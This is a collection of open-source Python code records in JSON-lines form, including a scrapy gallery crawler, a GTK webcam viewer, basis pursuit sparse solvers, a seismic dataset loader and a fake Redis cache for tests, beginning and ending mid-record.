specific projectid into manageable chunks.\n This allows instantiating the Manager object with different\n start and end markers, therefore allowing them to be validated.\n :param limit: number of elements per chunk\n :return: a list of lists containing projectid, vaultid\n start marker and an end marker.\n \"\"\"\n marker = None\n storage = None\n\n def metadata_list(marker, limit):\n\n try:\n\n block_ids = self.deuceclient.GetBlockList(self.vault,\n marker=marker,\n limit=limit)\n\n except RuntimeError as ex:\n msg = 'Storage Chunking for Projectid: {0},' \\\n 'Vault: {1} failed!' 
\\\n 'Error : {2}'.format(self.vault.project_id,\n self.vault.vault_id,\n str(ex))\n self.log.warn(msg)\n raise MetaChunkError(msg)\n\n if not len(block_ids):\n return (None, None)\n\n marker = self.vault.storageblocks.marker\n\n return (block_ids[0],\n marker)\n while True:\n\n start, end = metadata_list(marker, limit)\n\n if (start, end) == (None, None):\n storage = True\n break\n\n gen_expr = [self.vault.project_id,\n self.vault.vault_id,\n start,\n end]\n marker = end\n\n yield gen_expr\n\n if not end: # pragma: no cover\n break\n\n if storage:\n yield from self.store_chunker(limit)\n","repo_name":"rackerlabs/deuce-valere","sub_path":"deucevalere/splitter/meta_splitter.py","file_name":"meta_splitter.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"4038818312","text":"from dataclasses import dataclass, field\nfrom dataclasses_json import dataclass_json, config, LetterCase\nfrom PIL.Image import Image\nfrom Task import Task\nfrom base64converter import base_64_to_PIL_Image, PIL_Image_to_base_64\n\n\n@dataclass_json(letter_case=LetterCase.CAMEL)\n@dataclass\nclass Exam:\n '''\n Class for storing an exam.\n\n The attributes of an exam are:\n - Image of the exam.\n - Filename \n - List of tasks (see task.py)\n - Modified image for user feedback\n '''\n\n image: Image = field(\n compare=False,\n # required for json converting\n metadata=config(\n encoder=PIL_Image_to_base_64,\n decoder=base_64_to_PIL_Image\n )\n )\n filename: str\n tasks: list[Task] = field(compare=True, init=True)\n image_modified: Image = field(\n default=None,\n compare=False,\n init=False,\n # required for json converting\n metadata=config(\n encoder=PIL_Image_to_base_64,\n decoder=base_64_to_PIL_Image\n )\n )\n\n def __post_init__(self):\n self.image_modified = self.image\n","repo_name":"phfn/AI-Exam-Correction","sub_path":"src/backend/Exam.py","file_name":"Exam.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8639458057","text":"# logging has 5 different hierarchical levels of logs that a given logger may be configured to.\n#\n# Lets see what the python docs has to say about each level:\n#\n# DEBUG: Detailed information, for diagnosing problems. Value=10.\n# INFO: Confirm things are working as expected. Value=20.\n# WARNING: Something unexpected happened,\n# or indicative of some problem. But the software is still working as expected. Value=30.\n# ERROR: More serious problem, the software is not able to perform some function. Value=40\n# CRITICAL: A serious error, the program itself may be unable to continue running. Value=50\n# Now, coming back to the previous question of what would have happened had you not setup logging.basicConfig\n# (level=logging.INFO) in the previous example.\n#\n# The answer is: the log would not have been printed because, the default logger is the root and its\n# default basicConfig level is WARNING. That means, only messages from logging.warning() and higher levels will get\n# logged.\n# So, the message of logging.info() would not be printed. 
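# A quick way to see this filtering in a fresh interpreter (basicConfig()
# without an explicit level leaves the root logger at WARNING):
#
#   import logging
#   logging.basicConfig()               # root stays at WARNING by default
#   logging.info("invisible")           # below WARNING -> dropped
#   logging.warning("visible")          # prints WARNING:root:visible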
And that is why the basic config was set as INFO initially\n# (in logging.basicConfig(level=logging.INFO)).\n# Had I set the level as logging.ERROR instead, only messages from logging.error and logging.critical will be logged.\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\n\ndef hypotenuse(a, b):\n    \"\"\"Compute the hypotenuse\"\"\"\n    return (a**2 + b**2)**0.5\n\nkwargs = {'a':3, 'b':4, 'c':hypotenuse(3, 4)}\n\nlogging.debug(\"a = {a}, b = {b}\".format(**kwargs))\nlogging.info(\"Hypotenuse of {a}, {b} is {c}\".format(**kwargs))\nlogging.warning(\"a={a} and b={b} are equal\".format(**kwargs))\nlogging.error(\"a={a} and b={b} cannot be negative\".format(**kwargs))\nlogging.critical(\"Hypotenuse of {a}, {b} is {c}\".format(**kwargs))\n\n#> WARNING:root:a=3 and b=4 are equal\n#> ERROR:root:a=3 and b=4 cannot be negative\n#> CRITICAL:root:Hypotenuse of 3, 4 is 5.0\n\n","repo_name":"syurskyi/Python_Topics","sub_path":"090_logging/examples/Python Logging – Simplest Guide with Full Code and Examples/002_3. The 5 levels of logging.py","file_name":"002_3. The 5 levels of logging.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"33237151705","text":"import galleryCrawler as gC\n\nclass SantaEvent(gC.rssImageExtractor):\n    website = \"camster.com\"\n\n    def start_requests(self):\n        try:\n            filename = gC.sys.argv[1]\n        except:\n            # filename2 = \"upperbound.opml\"\n            filename = \"galleryLinks.opml\"\n            # filename = \"StaticLinks.opml\"\n            # filename = \"Test.opml\"\n        t = open(filename, \"r+\")\n        urls = t.readlines()\n        t.close()\n        gC.random.shuffle(urls)\n        for url in urls:\n            sqaureP = gC.re.search(\"@\\[(.*)\\]\", url)\n            if sqaureP != None:\n                lb, ub = [int(x) for x in gC.re.split(\"[-,]\",sqaureP[1])]\n                NewUrls = [url.replace(sqaureP[0],str(ui)) for ui in range(lb,ub)]\n                [urls.append(NewUrl) for NewUrl in NewUrls]\n                continue\n            if self.website in url:\n                yield gC.scrapy.Request(url=url.rstrip(), callback=self.parseFnc)\n\n    def parseFnc(self,response):\n        print(self.website)\n        url = response.url.strip(\"/#\")\n        imgUrls = response.css(\"img[src*=thumb]::attr(src)\").extract()\n        imgUrls = [x.replace(\"thumbs/\",\"\") for x in imgUrls]\n        fileNames = []\n        prefix = url.split(\"/\")[-1]\n        fileNames = [prefix +\" \"+ str(i)+\".jpg\" for i in response.css(\"img[src*=thumb]::attr(data-photo-id)\").extract()]\n        self.downloadGalleryGeneric(response, imgUrls, fileNames, galCode=\"@\")\n        temp = response.css(\"a[href*=\\?pg\\=]::text\").extract()\n        text = temp[0] if len(temp) > 0 else \"\"\n\n        print(imgUrls)\n        if \"Next\" in text:\n            print(\"traversingNext\")\n            url = response.css(\"a[href*=\\?pg\\=]::attr(href)\").extract()[0]\n            url = gC.urllib.request.urljoin(response.url, url)\n            yield gC.scrapy.Request(url=url.rstrip(), callback=self.parseFnc)\n\n\n\nif __name__ == \"__main__\":\n    print(SantaEvent.website)\n    try:\n        process = gC.CrawlerProcess({\n            'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n        })\n        process.crawl(SantaEvent)\n        process.start()\n    except Exception as e:\n        with open(\"log.txt\", \"a+\") as inF:\n            inF.write(str(e) + \"\\n\")\n","repo_name":"BeautyScraper/GalleryDownloader","sub_path":"camster.py","file_name":"camster.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"4271775000","text":"#!/usr/bin/python3\n\nimport gi\ngi.require_version('Gst', '1.0')\n\n#For threading 
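# (Referring to the SantaEvent crawler above) the "@[lb-ub]" marker in an
# OPML line expands to one URL per integer, with the upper bound exclusive.
# A worked example of the same logic, with a made-up URL:
#
#   import re
#   url = "https://example.test/gal/@[1-4]/"
#   m = re.search(r"@\[(.*)\]", url)
#   lb, ub = [int(x) for x in re.split("[-,]", m[1])]
#   [url.replace(m[0], str(i)) for i in range(lb, ub)]
#   # -> ['https://example.test/gal/1/', '.../gal/2/', '.../gal/3/']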
support\nfrom gi.repository import GObject\n\nGObject.threads_init()\n\n#For the as of this moment not working video...\nfrom gi.repository import Gst, Gtk\n# Needed for window.get_xid(), xvimagesink.set_window_handle(), respectively:\nfrom gi.repository import GdkX11, GstVideo\n\n#for keypresses\nfrom gi.repository import Gdk\n\nGst.init(None)\n\nfrom gi.repository import Gtk\n\nclass StatusIcon(Gtk.StatusIcon):\n def __init__(self, rootwin):\n Gtk.StatusIcon.__init__(self)\n self.rootwin = rootwin\n self.set_from_stock(Gtk.STOCK_HOME) \n self.connect(\"popup-menu\", self.right_click_event)\n\n def right_click_event(self, icon, button, time):\n self.menu = Gtk.Menu()\n \n about = Gtk.MenuItem()\n about.set_label(\"About\")\n about.connect(\"activate\", self.show_about_dialog)\n\n settings = Gtk.MenuItem()\n settings.set_label(\"Settings\")\n settings.connect(\"activate\", self.rootwin.properties_wrap)\n\n quit = Gtk.MenuItem()\n quit.set_label(\"Quit\") \n quit.connect(\"activate\", self.rootwin.quit)\n \n self.menu.append(settings)\n self.menu.append(about)\n self.menu.append(quit)\n \n self.menu.show_all()\n \n def pos(menu, icon):\n return (Gtk.StatusIcon.position_menu(menu, icon))\n \n self.menu.popup(None, None, pos, self, button, time)\n\n def show_about_dialog(self, widget):\n about_dialog = Gtk.AboutDialog()\n\n about_dialog.set_destroy_with_parent(True)\n about_dialog.set_name(\"CamCastic-Desktop\")\n about_dialog.set_version(\"0.1\")\n about_dialog.set_authors([\"Andrew King\",\"Mateo Salta\"])\n\n about_dialog.run()\n about_dialog.destroy()\n\nclass Player(object):\n def __init__(self):\n self.win = Gtk.Window()\n self.status_icon = StatusIcon(self)\n self.resolution = {\n 'width' : Gdk.get_default_root_window().get_width(),\n 'height' : Gdk.get_default_root_window().get_height()\n }\n self.height = int(self.resolution['height']/3)\n self.width = int(self.height/3*4)\n self.win.connect('destroy', self.quit)\n self.win.set_default_size(self.width, self.height)\n self.win.set_decorated(False)\n self.win.set_keep_above(True)\n self.win.set_property('skip-taskbar-hint', True)\n self.win.set_double_buffered(False)\n\n self.pipeline = Gst.parse_launch (\"v4l2src ! videoconvert ! 
xvimagesink\")\n\n self.bus = self.pipeline.get_bus()\n self.bus.add_signal_watch()\n self.bus.connect('message::eos', self.on_eos)\n self.bus.connect('message::error', self.on_error)\n\n self.bus.enable_sync_message_emission()\n self.bus.connect('sync-message::element', self.on_sync_message)\n\n self.win.connect(\"key-press-event\", self.on_keypress)\n self.on_keypress_dict = {\n Gdk.KEY_Escape : Gtk.main_quit,\n Gdk.KEY_F1 : self.pipeline.set_state,\n Gdk.KEY_F2 : self.pipeline.set_state,\n }\n self.state_args = {\n Gdk.KEY_Escape : Gtk.main_quit,\n Gdk.KEY_F1 : Gst.State.PLAYING,\n Gdk.KEY_F2 : Gst.State.NULL\n }\n self.win.move(self.resolution['width'] - self.width, self.resolution['height'] - self.height)\n\n def on_keypress(self, widget, event):\n '''\n A case switch statement to eliminate the\n five checks kludginess\n '''\n print('In keypress')\n if event.keyval == Gdk.KEY_F5: self.properties(widget, event)\n else: \n try:\n self.on_keypress_dict[event.keyval](self.state_args[event.keyval])\n except KeyError:\n pass\n\n def properties_wrap(self, arg):\n self.properties(None, None)\n\n def properties(self, widget, event):\n try:\n self.prop_win.show()\n except:\n self.prop_win = Gtk.Window(Gtk.WindowType.TOPLEVEL)\n self.prop_win.set_position(Gtk.WindowPosition.CENTER)\n self.prop_win.set_decorated(False)\n self.prop_win.set_title(\"Properties\")\n self.prop_win.set_size_request(320, 120)\n self.prop_win.set_resizable(False)\n self.prop_win.set_keep_above(True)\n self.prop_win.set_property('skip-taskbar-hint', True)\n self.prop_win.connect(\"destroy\", self.closeproperties)\n vbox = Gtk.VBox(spacing=4)\n\n hbox = Gtk.HBox(spacing=4)\n check = Gtk.CheckButton(\"Pin\")\n check.set_active(True)\n check.set_size_request(100, 35)\n check.connect(\"clicked\", self.pinning)\n hbox.pack_start(check, True, True, 10)\n scale = Gtk.HScale()\n scale.set_range(0, 100)\n scale.set_value(100)\n scale.set_size_request(320, 35)\n scale.connect(\"value-changed\", self.opac_slider)\n hbox.pack_start(scale, True, True, 10)\n self.entry = Gtk.Entry()\n self.entry2 = Gtk.Entry()\n\n self.entry.set_text(str(self.width))\n self.entry2.set_text(str(self.height))\n\n\n hbox2 = Gtk.HBox(spacing=4)\n hbox2.pack_start(self.entry, True, True, 10)\n hbox2.pack_start(self.entry2, True, True, 10)\n hbox3 = Gtk.HBox(spacing=4)\n ok = Gtk.Button(\"OK\")\n ok.connect(\"clicked\", self.change_size)\n hbox3.pack_start(ok, True, True, 10)\n exit = Gtk.Button(\"Exit\")\n exit.connect(\"clicked\", self.closeproperties)\n hbox3.pack_start(exit, True, True, 10)\n vbox.pack_start(hbox, True, True, 10)\n vbox.pack_start(hbox2, True, True, 10)\n vbox.pack_start(hbox3, True, True, 10)\n self.prop_win.add(vbox)\n self.prop_win.show_all()\n\n def pinning(self, checkbox):\n if checkbox.get_active():\n self.set_keep_above(True)\n else:\n self.set_keep_above(False)\n\n def opac_slider(self, w):\n self.win.set_opacity(w.get_value()/100.0)\n self.pipeline.set_state(Gst.State.PLAYING)\n \n def change_size(self, w):\n print('in change size')\n self.width = int(self.entry.get_text())\n self.height = int(self.entry2.get_text())\n self.win.resize(self.width,self.height)\n self.win.move(self.resolution['width'] - self.width, self.resolution['height'] - self.height)\n self.win.show_all()\n\n def closeproperties(self, w):\n self.prop_win.hide()\n\n def run(self):\n self.win.show_all()\n # You need to get the XID after window.show_all(). 
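        # Aside: the same Gst API can be exercised headlessly; a minimal
        # sketch (assumes PyGObject with GStreamer 1.0, no GUI required):
        #
        #   Gst.init(None)
        #   p = Gst.parse_launch('videotestsrc num-buffers=30 ! fakesink')
        #   p.set_state(Gst.State.PLAYING)
        #   p.get_bus().timed_pop_filtered(
        #       Gst.CLOCK_TIME_NONE,
        #       Gst.MessageType.EOS | Gst.MessageType.ERROR)
        #   p.set_state(Gst.State.NULL)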
You shouldn't get it\n        # in the on_sync_message() handler because threading issues will cause\n        # segfaults there.\n        self.xid = self.win.get_property('window').get_xid()\n\n        print('in get_xid')\n        self.pipeline.set_state(Gst.State.READY)\n        Gtk.main()\n\n    def quit(self, window):\n        self.pipeline.set_state(Gst.State.NULL)\n        Gtk.main_quit()\n\n    def on_sync_message(self, bus, msg):\n        if msg.get_structure().get_name() == 'prepare-window-handle':\n            print('prepare-window-handle')\n            msg.src.set_property('force-aspect-ratio', True)\n            msg.src.set_window_handle(self.xid)\n            print('prepped')\n\n    def on_eos(self, bus, msg):\n        print('on_eos(): seeking to start of video')\n        self.pipeline.seek_simple(\n            Gst.Format.TIME, \n            Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,\n            0\n        )\n\n    def on_error(self, bus, msg):\n        print('on_error():', msg.parse_error())\n\n\np = Player()\np.run()\n\n\n","repo_name":"mateosalta/CamCastic-Desktop","sub_path":"CamCastic/CamCastic.py","file_name":"CamCastic.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"}
{"seq_id":"18508355213","text":"from tkinter import*\r\n\r\njanela = Tk()\r\n\r\njanela.title(\"Janela Principal\")\r\njanela[\"bg\"]=\"gray\"\r\n\r\n\r\nlb1 = Label(janela, text=\"Email\")\r\nlb2 = Label(janela, text=\"Senha\")\r\n\r\ntxt1 = Entry(janela, width=50)\r\ntxt2 = Entry(janela, width=50)\r\n\r\nbtn = Button(janela, text = \"Login\")\r\nbtn1 = Button(janela, text = \"Recuperar senha\")\r\n\r\nlb1.grid(row=0, column=0)\r\nlb2.grid(row=1, column=0)\r\ntxt1.grid(row=0, column=1)\r\ntxt2.grid(row=1, column=1)\r\n\r\nbtn.grid(row=2, column=0)\r\nbtn1.grid(row=2, column=1)\r\n\r\n\r\n#window position and size\r\n#width x height + left offset + top offset\r\njanela.geometry(\"600x750+0+0\")\r\n\r\n\r\njanela.mainloop()\r\n","repo_name":"GermanaQueiroz/PROJETO-IN1076-","sub_path":"AberturaQuestionário.py","file_name":"AberturaQuestionário.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"16187834782","text":"r\"\"\"\nBasis Pursuit (BP) solvers tackle the original :math:`P_0` problem\n:eq:`p0_approx` by posing L1-relaxation on the norm of unknown :math:`\\vec{x}`.\n\n\n.. autosummary::\n    :toctree: toctree/relaxation/\n\n    basis_pursuit_linprog\n    basis_pursuit_admm\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.linalg import solve_triangular\nfrom scipy.optimize import linprog\n\nfrom sparse.relaxation.utils import soft_shrinkage, negligible_improvement\n\n\ndef basis_pursuit_linprog(A, b, max_iters=100):\n    r\"\"\"\n    Basis Pursuit solver for the :math:`P_1` problem\n\n    .. 
math::\n \\min_x \\|x\\|_1 \\quad \\text{s.t.} \\ \\boldsymbol{A} \\vec{x} = \\vec{b}\n :label: bp\n\n via linear programming.\n\n `scipy.optimize.linprog` is used to solve the linear programming task.\n\n Parameters\n ----------\n A : (N, M) np.ndarray\n The input weight matrix :math:`\\boldsymbol{A}`.\n b : (N,) np.ndarray\n The right side of the equation :eq:`bp`.\n tol : float\n The accuracy tolerance of linprog.\n\n Returns\n -------\n x : (M,) np.ndarray\n :math:`\\vec{x}`, the solution to :eq:`bp`.\n\n \"\"\"\n # We convert the problem by splitting x into the\n # positive and negative entries x=u-v, u,v>=0.\n #\n # The solution is returned in the vector x.\n\n # Set the options to be used by the linprog solver\n opt = {\"maxiter\": max_iters, \"disp\": False}\n\n A = np.asarray(A, dtype=np.float32)\n x_dim = A.shape[1]\n A_extended = np.c_[A, -A]\n coefficients_x = np.ones(A_extended.shape[1], dtype=np.float32)\n\n res = linprog(c=coefficients_x, A_eq=A_extended, b_eq=b, options=opt)\n\n x_extended = res.x\n x = x_extended[: x_dim] - x_extended[x_dim:]\n\n return x\n\n\ndef basis_pursuit_admm(A, b, lambd, tol=1e-4, max_iters=100,\n cholesky=False):\n r\"\"\"\n Basis Pursuit solver for the :math:`Q_1^\\epsilon` problem\n\n .. math::\n \\min_x \\frac{1}{2} \\left|\\left| \\boldsymbol{A}\\vec{x} - \\vec{b}\n \\right|\\right|_2^2 + \\lambda \\|x\\|_1\n\n via the alternating direction method of multipliers (ADMM).\n\n Parameters\n ----------\n A : (N, M) np.ndarray\n The input weight matrix :math:`\\boldsymbol{A}`.\n b : (N,) np.ndarray\n The right side of the equation :math:`\\boldsymbol{A}\\vec{x} = \\vec{b}`.\n lambd : float\n The soft-shrinkage threshold :math:`\\lambda`, controls the sparsity of\n :math:`\\vec{x}`.\n tol : float\n The accuracy tolerance of ADMM.\n max_iters : int\n Run for at most `max_iters` iterations.\n cholesky : bool\n Whether to use the Cholesky factorization (slow, but stable) or the\n inverse (fast, but might be unstable) of a matrix.\n\n Returns\n -------\n v : (M,) np.ndarray\n The solution vector :math:`\\vec{x}`.\n \"\"\"\n\n # Compute the vector of inner products between the atoms and the signal\n A_dot_b = A.T.dot(b)\n\n # In the x-update step of the ADMM we use the Cholesky factorization for\n # solving efficiently a given linear system Ax=b. The idea of this\n # factorization is to decompose a symmetric positive-definite matrix A\n # by A = L*L^T = L*U, where L is a lower triangular matrix and U is\n # its transpose. Given L and U, we can solve Ax = b by first solving\n # Ly = b for y by forward substitution, and then solving Ux = y\n # for x by back substitution.\n # To conclude, given A and b, where A is symmetric and positive-definite,\n # we first compute L using Matlab's command L = chol( A, 'lower' );\n # and get U by setting U = L'; Then, we obtain x via x = U \\ (L \\ b);\n # Note that the matrix A is fixed along the iterations of the ADMM\n # (and so as L and U). Therefore, in order to reduce computations,\n # we compute its decomposition once.\n\n # Compute the Cholesky factorization of M = CA'*CA + I for fast\n # computation of the x-update. 
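    # A small NumPy/SciPy check of the factor-then-substitute pattern
    # described above (illustrative sizes; not part of the original solver):
    #
    #   import numpy as np
    #   from scipy.linalg import cholesky, solve_triangular
    #
    #   rng = np.random.default_rng(0)
    #   B = rng.standard_normal((5, 5))
    #   M = B @ B.T + 5 * np.eye(5)                # symmetric positive-definite
    #   b = rng.standard_normal(5)
    #   L = cholesky(M, lower=True)                # M = L @ L.T
    #   y = solve_triangular(L, b, lower=True)     # forward substitution
    #   x = solve_triangular(L.T, y, lower=False)  # back substitution
    #   assert np.allclose(M @ x, b)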
Use Matlab's chol function and produce a\n # lower triangular matrix L, satisfying the equation M = L*L'\n M = A.T.dot(A) + np.eye(A.shape[1], dtype=np.float32)\n if cholesky:\n L = np.linalg.cholesky(M)\n else:\n M_inv = np.linalg.inv(M)\n\n # Initialize v\n v = np.zeros(A.shape[1], dtype=np.float32)\n\n # Initialize u, the dual variable of ADMM\n u = np.zeros(A.shape[1], dtype=np.float32)\n\n # Initialize the previous estimate of v, used for convergence test\n v_prev = v.copy()\n\n # main loop\n for i in range(max_iters):\n # x-update via Cholesky factorization. Solve the linear system\n # (CA'*CA + I)x = (CAtb + v - u)\n b_eff = A_dot_b + v - u\n if cholesky:\n # safe, slow\n y = solve_triangular(L, b_eff, trans=0, lower=True)\n x = solve_triangular(L, y, trans=2, lower=True)\n else:\n # unsafe, fast\n x = M_inv.dot(b_eff)\n\n # v-update via soft thresholding\n v = soft_shrinkage(x + u, lambd=lambd)\n\n # u-update according to the ADMM formula\n u = u + x - v\n\n # Check if converged\n if negligible_improvement(v, v_prev, tol=tol):\n break\n\n # Save the previous estimate in v_prev\n v_prev = v.copy()\n\n return v\n","repo_name":"dizcza/sparse-representation","sub_path":"sparse/relaxation/basis_pursuit.py","file_name":"basis_pursuit.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"69942595684","text":"import seisbench\r\nimport seisbench.util\r\nfrom seisbench.data.base import BenchmarkDataset, WaveformDataWriter\r\n\r\nfrom pathlib import Path\r\nimport h5py\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\nclass CWBSN(BenchmarkDataset):\r\n def __init__(self, loading_method=\"full\", **kwargs):\r\n\r\n self.loading_method = loading_method\r\n\r\n # ======================= #\r\n # TODO: citation, license #\r\n # ======================= #\r\n citation = ()\r\n license = \"\"\r\n super().__init__(citation=citation, license=license, **kwargs)\r\n\r\n def _download_dataset(self, writer: WaveformDataWriter, basepath=None, **kwargs):\r\n path = self.path\r\n\r\n # CWBSN: containing 2012~2021\r\n years = [str(y) for y in range(2012, 2022)]\r\n\r\n if basepath is None:\r\n raise ValueError(\"No cached version of CWBSN found. 
\")\r\n\r\n        basepath = Path(basepath)\r\n\r\n        # Data format\r\n        writer.data_format = {\r\n            \"dimension_order\": \"CW\",\r\n            \"component_order\": \"ZNE\",\r\n            \"sampling_rate\": 100,\r\n            \"measurement\": \"velocity/acceleration\",\r\n            \"unit\": \"cmps/cmps2\",\r\n        }\r\n\r\n        # Check all ten years of data for gaps and download any missing years\r\n        missing_metadata, missing_waveform = self.check(basepath, years)\r\n\r\n        # ============================================= #\r\n        # TODO: once the files are hosted online, add the download code here\r\n        # ============================================= #\r\n\r\n        # Loading dataset\r\n        if self.loading_method == \"simple\":\r\n            print(\"Simple loading...\")\r\n            writer = self.simple_load(writer, basepath, years)\r\n        elif self.loading_method == \"single\":\r\n            print(\"Single loading...\")\r\n            writer = self.single_load(writer, basepath, years)\r\n        elif self.loading_method == \"event\":\r\n            writer = self.event_load(writer, basepath, years)\r\n        elif self.loading_method == \"full\":\r\n            print(\"Fully loading...\")\r\n            writer = self.full_load(writer, basepath, years)\r\n\r\n    @staticmethod\r\n    def set_split(year):\r\n        if year == \"2021\" or year == \"2020\":\r\n            return \"test\"\r\n        elif year == \"2019\":\r\n            return \"dev\"\r\n        else:\r\n            return \"train\"\r\n\r\n    @staticmethod\r\n    def check(basepath, years):\r\n        metadata = []\r\n        waveform = []\r\n\r\n        for y in years:\r\n            path = \"metadata_\" + str(y) + \".csv\"\r\n            if not (basepath / path).is_file():\r\n                metadata.append(y)\r\n\r\n            path = \"chunks_\" + str(y) + \".hdf5\"\r\n            if not (basepath / path).is_file():\r\n                waveform.append(y)\r\n\r\n        return metadata, waveform\r\n\r\n    def full_load(self, writer, basepath, years):\r\n        # full load: load every trace into the dataset\r\n\r\n        total_trace = 0\r\n        for y in years:\r\n            print(\"years: \", y)\r\n            # Loading metadata (ex. 2020); later, load every year's data in one pass\r\n            meta_path = \"metadata_\" + y + \".csv\"\r\n            metadata = pd.read_csv(basepath / meta_path)\r\n\r\n            metadata[\"split\"] = self.set_split(y)\r\n\r\n            # Adding traces (ex. 2020); later, load every year's data in one pass\r\n            hdf5_path = \"chunks_\" + y + \".hdf5\"\r\n            with h5py.File(basepath / hdf5_path) as f:\r\n                gdata = f[\"data\"]\r\n                for _, row in metadata.iterrows():\r\n                    row = row.to_dict()\r\n\r\n                    # Adding trace only when waveform is available\r\n                    waveforms = gdata[row[\"trace_name\"]][()]\r\n\r\n                    writer.add_trace(row, waveforms)\r\n                    total_trace += 1\r\n\r\n        # Total number of traces\r\n        writer.set_total(total_trace)\r\n\r\n        return writer\r\n\r\n    def simple_load(self, writer, basepath, years):\r\n        # simple load: load only traces with trace_completeness == 1\r\n\r\n        total_trace = 0\r\n        for y in years:\r\n            print(\"years: \", y)\r\n            # Loading metadata (ex. 2020); later, load every year's data in one pass\r\n            meta_path = \"metadata_\" + y + \".csv\"\r\n            metadata = pd.read_csv(basepath / meta_path)\r\n\r\n            metadata[\"split\"] = self.set_split(y)\r\n\r\n            # Adding traces (ex. 2020); later, load every year's data in one pass\r\n            hdf5_path = \"chunks_\" + y + \".hdf5\"\r\n            with h5py.File(basepath / hdf5_path) as f:\r\n                gdata = f[\"data\"]\r\n                for _, row in metadata.iterrows():\r\n                    row = row.to_dict()\r\n\r\n                    # Adding trace only when waveform is available\r\n                    if row[\"trace_completeness\"] == 1:\r\n                        waveforms = gdata[row[\"trace_name\"]][()]\r\n\r\n                        writer.add_trace(row, waveforms)\r\n                        total_trace += 1\r\n\r\n        # Total number of traces\r\n        writer.set_total(total_trace)\r\n\r\n        return writer\r\n\r\n    def single_load(self, writer, basepath, years):\r\n        # single load: load only traces that contain exactly one event\r\n\r\n        total_trace = 0\r\n        for y in years:\r\n            print(\"years: \", y)\r\n            # Loading metadata (ex. 2020); later, load every year's data in one pass\r\n            meta_path = \"metadata_\" + y + \".csv\"\r\n            metadata = pd.read_csv(basepath / meta_path)\r\n\r\n            metadata[\"split\"] = self.set_split(y)\r\n\r\n            # Adding traces (ex. 2020); later, load every year's data in one pass\r\n            hdf5_path = \"chunks_\" + y + \".hdf5\"\r\n            with h5py.File(basepath / hdf5_path) as f:\r\n                gdata = f[\"data\"]\r\n                for _, row in metadata.iterrows():\r\n                    row = row.to_dict()\r\n\r\n                    # Adding trace only when waveform is available\r\n                    if (\r\n                        row[\"trace_completeness\"] == 1\r\n                        and row[\"trace_number_of_event\"] == 1\r\n                    ):\r\n                        waveforms = gdata[row[\"trace_name\"]][()]\r\n\r\n                        writer.add_trace(row, waveforms)\r\n                        total_trace += 1\r\n\r\n        # Total number of traces\r\n        writer.set_total(total_trace)\r\n\r\n        return writer\r\n","repo_name":"hgvf/Picking","sub_path":"seisbench/seisbench/data/cwbsn.py","file_name":"cwbsn.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"31364992320","text":"\"\"\"\nA fake cache that emulates just enough of the Redis interface to make unit\ntesting work.\n\"\"\"\n# pylint: disable=C0111,E1129\nfrom threading import RLock\nfrom time import time\n\n\nclass FakeCache(object):\n    \"\"\"\n    A fake cache that emulates just enough of the Redis interface to make unit\n    testing work.\n    \"\"\"\n\n    def __init__(self):\n        super(FakeCache, self).__init__()\n        self.data = {}\n        self.expires = {}\n        self.lock = RLock()\n        return\n\n    def get(self, key):\n        with self.lock:\n            expires = self.expires.get(key)\n            if expires is not None and time() > expires:\n                del self.expires[key]\n                del self.data[key]\n                return None\n\n            return self.data.get(key)\n\n    def set(self, key, value, ex=None):\n        with self.lock:\n            self.data[key] = str(value)\n            if ex is None:\n                if key in self.expires:\n                    del self.expires[key]\n            else:\n                self.expires[key] = time() + ex\n        return\n\n    def incrbyfloat(self, key, amount=1.0):\n        with self.lock:\n            value = self.get(key)\n            if value is None:\n                value = amount\n            else:\n                value = float(value) + amount\n\n            self.data[key] = str(value)\n\n        return value\n","repo_name":"dacut/meterer","sub_path":"tests/fake_cache.py","file_name":"fake_cache.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"70111500644","text":"'''\n    Write a program that receives ten values from the user and prints half of\neach of them, the total sum, and the arithmetic mean.\n'''\nsoma = 0\nn = range(10)\nfor i in n:\n\n    valor = int(input(f'Digite o {i+1}º valor: '))\n    print(f'A Metade de {valor} = {valor/2}\\n')\n    soma = soma+valor\nprint(f'SOMATORIO: {soma}\\nMEDIA: {soma/10}')","repo_name":"FllavioAndrade/exercicio-python","sub_path":"ufrn-poo/aula-4/exercicio-2.py","file_name":"exercicio-2.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"12568313434","text":"import cv2\n\ncamera_index = '/dev/video2'\n\ndef export_camera_frame(_output_filename):\n    # Open the camera\n    cap = cv2.VideoCapture(camera_index)\n\n    # Check if the camera is opened successfully\n    if not cap.isOpened():\n        print(f\"Error: Could not open camera {camera_index}\")\n        return\n\n    # Read a single frame from the camera\n    ret, frame = cap.read()\n\n    # Check if the frame is read successfully\n    if not ret:\n        print(\"Error: Could not read frame from the camera\")\n        cap.release()\n        return\n\n    # Save the frame as a JPG image\n    
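    # (Optional) cv2.imwrite infers JPEG from the extension; the quality can
    # also be set explicitly if needed, e.g.:
    #     cv2.imwrite(_output_filename, frame, [cv2.IMWRITE_JPEG_QUALITY, 95])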
